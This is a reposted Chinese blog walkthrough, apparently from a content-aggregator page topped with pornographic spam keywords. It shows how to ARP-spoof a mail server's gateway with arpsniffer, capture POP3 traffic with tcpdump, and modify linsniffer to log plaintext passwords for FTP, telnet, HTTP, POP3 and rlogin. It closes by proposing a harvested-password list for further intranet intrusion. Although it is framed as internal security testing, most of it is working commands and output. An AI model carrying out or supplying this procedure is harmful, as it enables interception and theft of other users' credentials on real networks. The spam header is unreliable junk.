日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

linux 嗅探密码,Linux下嗅探又一实例截取

發布時間:2023/12/2 linux 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 linux 嗅探密码,Linux下嗅探又一实例截取 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

在SecureCRT下利用rz命令上傳我們用到的arpsniffer.c,然后編譯:

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

報錯,可能是沒裝libnet的緣故,看說明Make: first you must install "pcap" and "libnet" 確定arpsniffer.c需要先裝pcap和 libnet。

[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm

[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0

[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz

[root@bbs111 root]# cd libpcap-0.8.1

[root@bbs111 libpcap-0.8.1]# ./configure

[root@bbs111 libpcap-0.8.1]# make

[root@bbs111 libpcap-0.8.1]# make install

準備工作已經ok。下面重新編譯arpsniffer.c

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

這次沒報錯,編譯成功。

[root@bbs111 root]# ./arpsniffer

====================================

============Arp Sniffer=============

==========Write by Paris-Ye=========

===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]

===For example:

./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面開始欺騙,由于是服務器端,因此我們欺騙網關:(網絡環境如下,郵件服務器ip:192.168.0.11 網關:192.168.0.1 本機:192.168.0.77)

[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

110

110

Get network cards mac address:

M-> 00:0e:a6:a5:80:4f

W-> 00:0f:e2:23:05:d0

S-> 00:d0:b7:88:07:59

Now Start... .. .

在另一個登錄里面用tcpdump監聽下:

[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11

發現有數據,把監聽的數據存在文件里面:

[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分鐘后停止,在SecureCRT下用sz命令下載pop.txt到本地,然后用Ethereal分析。果然發現明文用戶名和密碼。

下面我們就可以用linsniffer監聽我們想要的用戶名和密碼了。

先修改linsniffer.c:根據自己的需求監聽相應的應用密碼。我的如下:

if(ntohs(tcp->dest)==21)? p=1; /* ftp */

if(ntohs(tcp->dest)==22)? p=1; /* ssh for comparison added for example only comment out if desired*/

if(ntohs(tcp->dest)==23)? p=1; /* telnet */

if(ntohs(tcp->dest)==80) p=1;? /* http */

if(ntohs(tcp->dest)==110) p=1; /* pop3 */

if(ntohs(tcp->dest)==513) p=1; /* rlogin */

if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c

In file included from /usr/include/linux/tcp.h:21,

from linsniffer.c:32:

/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!

不用管警告,直接運行編譯后的linsniffer即可。

[root@bbs111 root]# ./linsniffer

用戶名和密碼都自動存到了tcp.log下。如圖8:

經過測試后,我們把某人的用戶名和密碼發給某人,相信他再不會想當然的說sniffer不可能了。下面我們利用我們嗅探到的密碼做個密碼表,進行新一輪進一步的內網***測試。相信在我們根據***測試結果,進行相關安全技術改造和安全管理規范制度改造后,我們的網絡的安全性會大大提升。

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的linux 嗅探密码,Linux下嗅探又一实例截取的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。